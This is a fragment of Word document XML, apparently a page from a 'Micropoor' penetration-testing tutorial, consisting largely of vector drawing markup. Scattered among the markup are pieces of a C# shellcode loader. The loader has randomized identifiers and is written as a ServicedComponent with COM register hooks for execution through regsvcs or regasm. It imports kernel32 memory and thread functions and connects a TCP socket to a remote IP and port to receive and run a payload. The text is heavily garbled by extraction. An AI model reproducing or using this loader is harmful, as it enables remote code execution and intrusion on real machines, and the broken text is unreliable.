517,15632e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.500pt;margin-top:645.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4690,12910" coordsize="130,270">
        <v:shape style="position:absolute;left:4690;top:12910;width:130;height:270" coordorigin="4690,12910" coordsize="130,270" path="m4706,12931l4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4706,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4707,12931,4708,12931,4708,12931,4708,12931,4708,12931,4708,12931,4708,12931,4709,12931,4709,12931,4709,12931,4709,12931,4710,12931,4710,12931,4710,12931,4711,12931,4711,12931,4711,12931,4712,12931,4712,12931,4712,12931,4713,12931,4713,12931,4714,12931,4714,12931,4715,12931,4715,12931,4716,12931,4716,12931,4717,12931,4718,12931,4718,12931,4719,12931,4720,12931,4720,12931,4721,12931,4722,12931,4723,12931,4723,12931,4724,12931,4725,12931,4726,12931,4727,12931,4728,12931,4729,12931,4730,12931,4731,12931,4732,12931,4733,12931,4734,12931,4735,12931,4736,12931,4738,12931,4739,12931,4740,12931,4741,12931,4743,12931,4744,12931,4746,12931,4747,12931,4749,12931,4750,12931,4752,12931,4753,12931,4755,12931,4757,12931,4758,12931,4760,12931,4762,12931,4764,12931,4766,12931,4767,12931,4769,12931,4771,12931,4773,12931,4776,12931,4778,12931,4780,12931,4782,12931,4784,12931,4787,12931,4789,12931,4791,12931,4794,12931,4796,12931,4799,12931,4801,12931,4804,12931,4806,12931,4809,12931,4812,12931,4815,12931,4818,12931,4820,12931,4823,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12931,4826,12932,4826,12932,4826,12932,4826,12932,4826,12932,4826,12933,4826,12933,4826,12933,4826,12933,4826,12934,4826,12934,4826,12935,4826,12935,4826,12935,4826,12936,4826,12936,4826,12937,4826,12938,4826,12938,4826,12939,4826,12939,4826,12940,4826,12941,4826,12942,4826,12943,4826,12943,4826,12944,4826,12945,4826,12946,4826,12947,4826,12948,4826,12949,4826,12951,4826,12952,4826,12953,4826,12954,4826,12956,4826,12957,4826,12959,4826,12960,4826,12962,4826,12963,4826,12965,4826,12967,4826,12968,4826,12970,4826,12972,4826,12974,4826,12976,4826,12978,4826,12980,4826,12982,4826,12985,4826,12987,4826,12989,4826,12992,4826,12994,4826,12997,4826,13000,4826,13002,4826,13005,4826,13008,4826,13011,4826,13014,4826,13017,4826,13020,4826,13023,4826,13027,4826,13030,4826,13034,4826,13037,4826,13041,4826,13045,4826,13048,4826,13052,4826,13056,4826,13060,4826,13064,4826,13069,4826,13073,4826,13077,4826,13082,4826,13086,4826,13091,4826,13096,4826,13101,4826,13106,4826,13111,4826,13116,4826,13121,4826,13127,4826,13132,4826,13138,4826,13143,4826,13149,4826,13155,4826,13161,4826,13167,4826,13173,4826,13179,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4826,13186,4825,13186,4825,13186,4825,13186,4825,13186,4825,13186,4825,13186,4825,13186,4824,13186,4824,13186,4824,13186,4824,13186,4823,13186,4823,13186,4823,13186,4823,13186,4822,13186,4822,13186,4822,13186,4821,13186,4821,13186,4820,13186,4820,13186,4819,13186,4819,13186,4819,13186,4818,13186,4818,13186,4817,13186,4816,13186,4816,13186,4815,13186,4815,13186,4814,13186,4813,13186,4813,13186,4812,13186,4811,13186,4810,13186,4809,13186,4809,13186,4808,13186,4807,13186,4806,13186,4805,13186,4804,13186,4803,13186,4802,13186,4801,13186,4800,13186,4799,13186,4798,13186,4796,13186,4795,13186,4794,13186,4793,13186,4791,13186,4790,13186,4789,13186,4787,13186,4786,13186,4784,13186,4783,13186,4781,13186,4780,13186,4778,13186,4776,13186,4774,13186,4773,13186,4771,13186,4769,13186,4767,13186,4765,13186,4763,13186,4761,13186,4759,13186,4757,13186,4755,13186,4753,13186,4751,13186,4749,13186,4746,13186,4744,13186,4742,13186,4739,13186,4737,13186,4734,13186,4732,13186,4729,13186,4726,13186,4724,13186,4721,13186,4718,13186,4715,13186,4712,13186,4709,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13186,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13185,4706,13184,4706,13184,4706,13184,4706,13184,4706,13184,4706,13183,4706,13183,4706,13183,4706,13182,4706,13182,4706,13182,4706,13181,4706,13181,4706,13180,4706,13180,4706,13179,4706,13179,4706,13178,4706,13177,4706,13177,4706,13176,4706,13175,4706,13174,4706,13174,4706,13173,4706,13172,4706,13171,4706,13170,4706,13169,4706,13168,4706,13167,4706,13166,4706,13164,4706,13163,4706,13162,4706,13160,4706,13159,4706,13158,4706,13156,4706,13155,4706,13153,4706,13151,4706,13150,4706,13148,4706,13146,4706,13144,4706,13142,4706,13140,4706,13138,4706,13136,4706,13134,4706,13131,4706,13129,4706,13127,4706,13124,4706,13122,4706,13119,4706,13117,4706,13114,4706,13111,4706,13108,4706,13105,4706,13102,4706,13099,4706,13096,4706,13093,4706,13089,4706,13086,4706,13082,4706,13079,4706,13075,4706,13072,4706,13068,4706,13064,4706,13060,4706,13056,4706,13052,4706,13047,4706,13043,4706,13039,4706,13034,4706,13030,4706,13025,4706,13020,4706,13015,4706,13010,4706,13005,4706,13000,4706,12995,4706,12990,4706,12984,4706,12979,4706,12973,4706,12967,4706,12961,4706,12955,4706,12949,4706,12943,4706,12937,4706,12931e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:677.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,13550" coordsize="130,270">
        <v:shape style="position:absolute;left:4090;top:13550;width:130;height:270" coordorigin="4090,13550" coordsize="130,270" path="m4106,13576l4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4106,13576,4107,13576,4107,13576,4107,13576,4107,13576,4107,13576,4107,13576,4107,13576,4107,13576,4107,13576,4108,13576,4108,13576,4108,13576,4108,13576,4108,13576,4109,13576,4109,13576,4109,13576,4109,13576,4110,13576,4110,13576,4110,13576,4111,13576,4111,13576,4111,13576,4112,13576,4112,13576,4113,13576,4113,13576,4113,13576,4114,13576,4114,13576,4115,13576,4116,13576,4116,13576,4117,13576,4117,13576,4118,13576,4119,13576,4119,13576,4120,13576,4121,13576,4121,13576,4122,13576,4123,13576,4124,13576,4125,13576,4126,13576,4127,13576,4127,13576,4128,13576,4129,13576,4131,13576,4132,13576,4133,13576,4134,13576,4135,13576,4136,13576,4137,13576,4139,13576,4140,13576,4141,13576,4143,13576,4144,13576,4145,13576,4147,13576,4148,13576,4150,13576,4151,13576,4153,13576,4155,13576,4156,13576,4158,13576,4160,13576,4162,13576,4163,13576,4165,13576,4167,13576,4169,13576,4171,13576,4173,13576,4175,13576,4177,13576,4179,13576,4182,13576,4184,13576,4186,13576,4189,13576,4191,13576,4193,13576,4196,13576,4198,13576,4201,13576,4204,13576,4206,13576,4209,13576,4212,13576,4214,13576,4217,13576,4220,13576,4223,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13576,4226,13577,4226,13577,4226,13577,4226,13577,4226,13577,4226,13577,4226,13578,4226,13578,4226,13578,4226,13579,4226,13579,4226,13579,4226,13580,4226,13580,4226,13580,4226,13581,4226,13581,4226,13582,4226,13582,4226,13583,4226,13584,4226,13584,4226,13585,4226,13586,4226,13586,4226,13587,4226,13588,4226,13589,4226,13590,4226,13591,4226,13592,4226,13593,4226,13594,4226,13595,4226,13596,4226,13597,4226,13598,4226,13600,4226,13601,4226,13602,4226,13604,4226,13605,4226,13607,4226,13609,4226,13610,4226,13612,4226,13614,4226,13616,4226,13617,4226,13619,4226,13621,4226,13623,4226,13626,4226,13628,4226,13630,4226,13632,4226,13635,4226,13637,4226,13640,4226,13642,4226,13645,4226,13648,4226,13650,4226,13653,4226,13656,4226,13659,4226,13662,4226,13666,4226,13669,4226,13672,4226,13676,4226,13679,4226,13683,4226,13686,4226,13690,4226,13694,4226,13698,4226,13702,4226,13706,4226,13710,4226,13714,4226,13718,4226,13723,4226,13727,4226,13732,4226,13737,4226,13741,4226,13746,4226,13751,4226,13756,4226,13761,4226,13767,4226,13772,4226,13777,4226,13783,4226,13789,4226,13794,4226,13800,4226,13806,4226,13812,4226,13818,4226,13825,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4226,13831,4225,13831,4225,13831,4225,13831,4225,13831,4225,13831,4225,13831,4225,13831,4225,13831,4224,13831,4224,13831,4224,13831,4224,13831,4224,13831,4223,13831,4223,13831,4223,13831,4223,13831,4222,13831,4222,13831,4222,13831,4221,13831,4221,13831,4220,13831,4220,13831,4220,13831,4219,13831,4219,13831,4218,13831,4218,13831,4217,13831,4217,13831,4216,13831,4216,13831,4215,13831,4214,13831,4214,13831,4213,13831,4212,13831,4211,13831,4211,13831,4210,13831,4209,13831,4208,13831,4207,13831,4207,13831,4206,13831,4205,13831,4204,13831,4203,13831,4202,13831,4201,13831,4200,13831,4198,13831,4197,13831,4196,13831,4195,13831,4194,13831,4192,13831,4191,13831,4190,13831,4188,13831,4187,13831,4185,13831,4184,13831,4182,13831,4181,13831,4179,13831,4178,13831,4176,13831,4174,13831,4172,13831,4171,13831,4169,13831,4167,13831,4165,13831,4163,13831,4161,13831,4159,13831,4157,13831,4155,13831,4153,13831,4151,13831,4148,13831,4146,13831,4144,13831,4141,13831,4139,13831,4136,13831,4134,13831,4131,13831,4129,13831,4126,13831,4123,13831,4121,13831,4118,13831,4115,13831,4112,13831,4109,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13831,4106,13830,4106,13830,4106,13830,4106,13830,4106,13830,4106,13830,4106,13830,4106,13829,4106,13829,4106,13829,4106,13829,4106,13828,4106,13828,4106,13828,4106,13827,4106,13827,4106,13826,4106,13826,4106,13826,4106,13825,4106,13824,4106,13824,4106,13823,4106,13823,4106,13822,4106,13821,4106,13821,4106,13820,4106,13819,4106,13818,4106,13817,4106,13816,4106,13815,4106,13814,4106,13813,4106,13812,4106,13811,4106,13810,4106,13808,4106,13807,4106,13806,4106,13804,4106,13803,4106,13801,4106,13800,4106,13798,4106,13797,4106,13795,4106,13793,4106,13791,4106,13789,4106,13787,4106,13785,4106,13783,4106,13781,4106,13779,4106,13777,4106,13774,4106,13772,4106,13770,4106,13767,4106,13765,4106,13762,4106,13759,4106,13756,4106,13753,4106,13751,4106,13747,4106,13744,4106,13741,4106,13738,4106,13735,4106,13731,4106,13728,4106,13724,4106,13721,4106,13717,4106,13713,4106,13709,4106,13705,4106,13701,4106,13697,4106,13693,4106,13688,4106,13684,4106,13680,4106,13675,4106,13670,4106,13666,4106,13661,4106,13656,4106,13651,4106,13646,4106,13640,4106,13635,4106,13629,4106,13624,4106,13618,4106,13613,4106,13607,4106,13601,4106,13595,4106,13588,4106,13582,4106,13576e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:228.500pt;margin-top:746.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4570,14930" coordsize="130,250">
        <v:shape style="position:absolute;left:4570;top:14930;width:130;height:250" coordorigin="4570,14930" coordsize="130,250" path="m4586,14942l4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4586,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4587,14942,4588,14942,4588,14942,4588,14942,4588,14942,4588,14942,4588,14942,4589,14942,4589,14942,4589,14942,4589,14942,4590,14942,4590,14942,4590,14942,4591,14942,4591,14942,4591,14942,4592,14942,4592,14942,4592,14942,4593,14942,4593,14942,4594,14942,4594,14942,4595,14942,4595,14942,4596,14942,4596,14942,4597,14942,4598,14942,4598,14942,4599,14942,4600,14942,4600,14942,4601,14942,4602,14942,4602,14942,4603,14942,4604,14942,4605,14942,4606,14942,4607,14942,4608,14942,4609,14942,4610,14942,4611,14942,4612,14942,4613,14942,4614,14942,4615,14942,4616,14942,4618,14942,4619,14942,4620,14942,4621,14942,4623,14942,4624,14942,4626,14942,4627,14942,4629,14942,4630,14942,4632,14942,4633,14942,4635,14942,4637,14942,4638,14942,4640,14942,4642,14942,4644,14942,4645,14942,4647,14942,4649,14942,4651,14942,4653,14942,4655,14942,4658,14942,4660,14942,4662,14942,4664,14942,4666,14942,4669,14942,4671,14942,4674,14942,4676,14942,4679,14942,4681,14942,4684,14942,4686,14942,4689,14942,4692,14942,4695,14942,4698,14942,4700,14942,4703,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14942,4706,14943,4706,14943,4706,14943,4706,14943,4706,14943,4706,14944,4706,14944,4706,14944,4706,14945,4706,14945,4706,14945,4706,14946,4706,14946,4706,14946,4706,14947,4706,14947,4706,14948,4706,14949,4706,14949,4706,14950,4706,14951,4706,14951,4706,14952,4706,14953,4706,14954,4706,14954,4706,14955,4706,14956,4706,14957,4706,14958,4706,14959,4706,14960,4706,14962,4706,14963,4706,14964,4706,14965,4706,14967,4706,14968,4706,14970,4706,14971,4706,14973,4706,14974,4706,14976,4706,14978,4706,14979,4706,14981,4706,14983,4706,14985,4706,14987,4706,14989,4706,14991,4706,14993,4706,14996,4706,14998,4706,15000,4706,15003,4706,15005,4706,15008,4706,15011,4706,15013,4706,15016,4706,15019,4706,15022,4706,15025,4706,15028,4706,15031,4706,15035,4706,15038,4706,15041,4706,15045,4706,15048,4706,15052,4706,15056,4706,15059,4706,15063,4706,15067,4706,15071,4706,15075,4706,15080,4706,15084,4706,15088,4706,15093,4706,15098,4706,15102,4706,15107,4706,15112,4706,15117,4706,15122,4706,15127,4706,15132,4706,15138,4706,15143,4706,15149,4706,15154,4706,15160,4706,15166,4706,15172,4706,15178,4706,15184,4706,15190,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4706,15197,4705,15197,4705,15197,4705,15197,4705,15197,4705,15197,4705,15197,4704,15197,4704,15197,4704,15197,4704,15197,4704,15197,4703,15197,4703,15197,4703,15197,4702,15197,4702,15197,4702,15197,4701,15197,4701,15197,4701,15197,4700,15197,4700,15197,4699,15197,4699,15197,4698,15197,4698,15197,4697,15197,4697,15197,4696,15197,4696,15197,4695,15197,4695,15197,4694,15197,4693,15197,4692,15197,4692,15197,4691,15197,4690,15197,4689,15197,4689,15197,4688,15197,4687,15197,4686,15197,4685,15197,4684,15197,4683,15197,4682,15197,4681,15197,4680,15197,4679,15197,4677,15197,4676,15197,4675,15197,4674,15197,4673,15197,4671,15197,4670,15197,4669,15197,4667,15197,4666,15197,4664,15197,4663,15197,4661,15197,4659,15197,4658,15197,4656,15197,4654,15197,4653,15197,4651,15197,4649,15197,4647,15197,4645,15197,4643,15197,4641,15197,4639,15197,4637,15197,4635,15197,4633,15197,4631,15197,4629,15197,4626,15197,4624,15197,4622,15197,4619,15197,4617,15197,4614,15197,4612,15197,4609,15197,4606,15197,4604,15197,4601,15197,4598,15197,4595,15197,4592,15197,4589,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15197,4586,15196,4586,15196,4586,15196,4586,15196,4586,15196,4586,15196,4586,15196,4586,15196,4586,15196,4586,15195,4586,15195,4586,15195,4586,15195,4586,15195,4586,15194,4586,15194,4586,15194,4586,15193,4586,15193,4586,15193,4586,15192,4586,15192,4586,15191,4586,15191,4586,15190,4586,15190,4586,15189,4586,15188,4586,15188,4586,15187,4586,15186,4586,15185,4586,15185,4586,15184,4586,15183,4586,15182,4586,15181,4586,15180,4586,15179,4586,15178,4586,15177,4586,15175,4586,15174,4586,15173,4586,15171,4586,15170,4586,15169,4586,15167,4586,15166,4586,15164,4586,15162,4586,15161,4586,15159,4586,15157,4586,15155,4586,15153,4586,15151,4586,15149,4586,15147,4586,15145,4586,15142,4586,15140,4586,15138,4586,15135,4586,15133,4586,15130,4586,15128,4586,15125,4586,15122,4586,15119,4586,15116,4586,15113,4586,15110,4586,15107,4586,15104,4586,15100,4586,15097,4586,15093,4586,15090,4586,15086,4586,15083,4586,15079,4586,15075,4586,15071,4586,15067,4586,15063,4586,15058,4586,15054,4586,15050,4586,15045,4586,15041,4586,15036,4586,15031,4586,15026,4586,15021,4586,15016,4586,15011,4586,15006,4586,15001,4586,14995,4586,14990,4586,14984,4586,14978,4586,14972,4586,14966,4586,14960,4586,14954,4586,14948,4586,14942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93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Net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Linq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Net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ckets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Runtime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InteropServices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Threading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usin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g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EnterpriseServices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Windows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Forms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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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namespace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phwUqeuTRSqn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419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public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class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mfBxqerbXgh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ServicedComponent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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="299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public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mfBxqerbXgh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Console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WriteLine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"Micropoor"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7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ComRegisterFunction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public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void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RegisterClass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string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DssjWsFMnwwXL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uXsiCEXRzLNkI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BBNSohgZXGCaD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950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13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ComUnregisterFunction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public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void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UnRegisterClass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string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DssjWsFMnwwXL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uXsiCEXRzLNkI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BBNSohgZXGCaD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950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20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25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public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class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uXsiCEXRzLNkI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DllImport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"kernel32"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private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extern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HeapCreate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pAyHWx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KXNJUcPIUymFNbJ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MotkftcMAIJRnW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45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DllImport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"kernel32"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private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extern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HeapAlloc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yjmmncJHBrUu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MYjktCDxYrlTs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zyBAwQVBQbi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DllImport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"kernel32"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private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extern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RtlMoveMemory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UIn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PorEiXBhZkA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UIkcqF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wAXQEPCIVJQQb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DllImport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"kernel32"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private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extern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IntPtr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CreateThread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UInt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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WNvQyYv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vePRog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Bwxjth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IntPtr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ExkSdsTdwD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KfNaM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FOJVTSxbrR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ref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QEuyYka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56" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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26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DllImport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"kernel32"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private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extern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WaitForSingleObje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ct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IntPtr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pzymHg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lReJrqjtOqvkXk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SVMBrK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string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MKwS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jIxqTxxEO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int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jVaXWRxcmw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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="99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IPEndPoint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hqbNYMZQr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IPEndPoint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IPAddress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Parse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MKwSjIxqTxxEO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jVaXWRxcmw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28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Socket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LbLgipot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Socket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AddressFamily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InterNetwork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SocketType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tream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ProtocolType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Tcp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29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try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LbLgipot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Connect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hqbNYMZQr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}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30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catch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return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null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31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VKQsLPgLmVdp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LbLgipot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Receive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VKQsLPgLmVdp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580.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:530.242pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,10604">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:10604" coordorigin="10402,0" coordsize="0,10604" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,10,10402,13,10402,17,10402,21,10402,25,10402,30,10402,36,10402,43,10402,50,10402,58,10402,67,10402,76,10402,86,10402,98,10402,110,10402,123,10402,138,10402,153,10402,169,10402,187,10402,206,10402,226,10402,247,10402,269,10402,293,10402,318,10402,345,10402,373,10402,402,10402,433,10402,466,10402,500,10402,536,10402,573,10402,612,10402,653,10402,695,10402,740,10402,786,10402,834,10402,884,10402,936,10402,990,10402,1047,10402,1105,10402,1165,10402,1227,10402,1292,10402,1359,10402,1428,10402,1499,10402,1573,10402,1649,10402,1728,10402,1809,10402,1892,10402,1978,10402,2067,10402,2158,10402,2252,10402,2348,10402,2448,10402,2550,10402,2654,10402,2762,10402,2873,10402,2986,10402,3102,10402,3222,10402,3344,10402,3469,10402,3598,10402,3729,10402,3864,10402,4002,10402,4144,10402,4288,10402,4436,10402,4587,10402,4742,10402,4900,10402,5061,10402,5226,10402,5395,10402,5567,10402,5743,10402,5922,10402,6106,10402,6293,10402,6483,10402,6678,10402,6876,10402,7078,10402,7285,10402,7495,10402,7709,10402,7927,10402,8149,10402,8376,10402,8606,10402,8841,10402,9080,10402,9323,10402,9570,10402,9822,10402,10079,10402,10339,10402,10604e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,37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9.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:390" coordorigin="1490,1710" coordsize="8990,39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8,10484,1738,10484,1738,10484,1739,10484,1739,10484,1740,10484,1740,10484,1741,10484,1742,10484,1742,10484,1743,10484,1744,10484,1744,10484,1745,10484,1746,10484,1747,10484,1748,10484,1749,10484,1750,10484,1751,10484,1753,10484,1754,10484,1755,10484,1757,10484,1758,10484,1759,10484,1761,10484,1763,10484,1764,10484,1766,10484,1768,10484,1770,10484,1772,10484,1774,10484,1776,10484,1778,10484,1781,10484,1783,10484,1785,10484,1788,10484,1791,10484,1793,10484,1796,10484,1799,10484,1802,10484,1805,10484,1808,10484,1811,10484,1815,10484,1818,10484,1821,10484,1825,10484,1829,10484,1833,10484,1837,10484,1841,10484,1845,10484,1849,10484,1853,10484,1858,10484,1862,10484,1867,10484,1872,10484,1876,10484,1881,10484,1887,10484,1892,10484,1897,10484,1903,10484,1908,10484,1914,10484,1920,10484,1926,10484,1932,10484,1938,10484,1944,10484,1951,10484,1958,10484,1964,10484,1971,10484,1978,10484,1985,10484,1993,10484,2000,10484,2008,10484,2015,10484,2023,10484,2031,10484,2039,10484,2048,10484,2056,10484,2065,10484,2073,10484,2082,10484,2091,10484,2101,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10483,2110,10482,2110,10482,2110,10480,2110,10479,2110,10477,2110,10475,2110,10473,2110,10470,2110,10466,2110,10462,2110,10458,2110,10453,2110,10448,2110,10442,2110,10435,2110,10428,2110,10419,2110,10411,2110,10401,2110,10391,2110,10379,2110,10367,2110,10354,2110,10340,2110,10326,2110,10310,2110,10293,2110,10275,2110,10256,2110,10236,2110,10215,2110,10192,2110,10168,2110,10143,2110,10117,2110,10090,2110,10061,2110,10031,2110,9999,2110,9966,2110,9931,2110,9895,2110,9858,2110,9819,2110,9778,2110,9735,2110,9691,2110,9646,2110,9598,2110,9549,2110,9498,2110,9445,2110,9391,2110,9334,2110,9275,2110,9215,2110,9153,2110,9088,2110,9022,2110,8953,2110,8883,2110,8810,2110,8735,2110,8658,2110,8578,2110,8497,2110,8413,2110,8326,2110,8238,2110,8146,2110,8053,2110,7957,2110,7859,2110,7758,2110,7654,2110,7548,2110,7439,2110,7328,2110,7214,2110,7097,2110,6977,2110,6855,2110,6730,2110,6602,2110,6471,2110,6337,2110,6201,2110,6061,2110,5918,2110,5773,2110,5624,2110,5472,2110,5317,2110,5159,2110,4997,2110,4833,2110,4665,2110,4494,2110,4319,2110,4141,2110,3960,2110,3776,2110,3587,2110,3396,2110,3201,2110,3002,2110,2800,2110,2594,2110,2385,2110,2172,2110,1955,2110,1734,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2110,1510,2109,1510,2109,1510,2109,1510,2109,1510,2109,1510,2109,1510,2108,1510,2108,1510,2108,1510,2107,1510,2107,1510,2107,1510,2106,1510,2106,1510,2105,1510,2105,1510,2104,1510,2103,1510,2103,1510,2102,1510,2101,1510,2101,1510,2100,1510,2099,1510,2098,1510,2097,1510,2096,1510,2095,1510,2094,1510,2092,1510,2091,1510,2090,1510,2088,1510,2087,1510,2085,1510,2084,1510,2082,1510,2081,1510,2079,1510,2077,1510,2075,1510,2073,1510,2071,1510,2069,1510,2067,1510,2064,1510,2062,1510,2060,1510,2057,1510,2054,1510,2052,1510,2049,1510,2046,1510,2043,1510,2040,1510,2037,1510,2034,1510,2030,1510,2027,1510,2023,1510,2020,1510,2016,1510,2012,1510,2008,1510,2004,1510,2000,1510,1996,1510,1992,1510,1987,1510,1983,1510,1978,1510,1973,1510,1968,1510,1963,1510,1958,1510,1953,1510,1948,1510,1942,1510,1937,1510,1931,1510,1925,1510,1919,1510,1913,1510,1907,1510,1901,1510,1894,1510,1887,1510,1881,1510,1874,1510,1867,1510,1860,1510,1852,1510,1845,1510,1837,1510,1830,1510,1822,1510,1814,1510,1806,1510,1797,1510,1789,1510,1780,1510,1771,1510,1763,1510,1753,1510,1744,1510,1735e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1730;width:30;height:370" coordorigin="1490,1730" coordsize="30,370" path="m1517,1735l1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1736,1517,1736,1517,1736,1517,1736,1517,1736,1517,1737,1517,1737,1517,1737,1517,1738,1517,1738,1517,1738,1517,1739,1517,1739,1517,1740,1517,1740,1517,1741,1517,1742,1517,1742,1517,1743,1517,1744,1517,1744,1517,1745,1517,1746,1517,1747,1517,1748,1517,1749,1517,1750,1517,1751,1517,1753,1517,1754,1517,1755,1517,1757,1517,1758,1517,1759,1517,1761,1517,1763,1517,1764,1517,1766,1517,1768,1517,1770,1517,1772,1517,1774,1517,1776,1517,1778,1517,1781,1517,1783,1517,1785,1517,1788,1517,1791,1517,1793,1517,1796,1517,1799,1517,1802,1517,1805,1517,1808,1517,1811,1517,1815,1517,1818,1517,1821,1517,1825,1517,1829,1517,1833,1517,1837,1517,1841,1517,1845,1517,1849,1517,1853,1517,1858,1517,1862,1517,1867,1517,1872,1517,1876,1517,1881,1517,1887,1517,1892,1517,1897,1517,1903,1517,1908,1517,1914,1517,1920,1517,1926,1517,1932,1517,1938,1517,1944,1517,1951,1517,1958,1517,1964,1517,1971,1517,1978,1517,1985,1517,1993,1517,2000,1517,2008,1517,2015,1517,2023,1517,2031,1517,2039,1517,2048,1517,2056,1517,2065,1517,2073,1517,2082,1517,2091,1517,2101,1517,2110e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
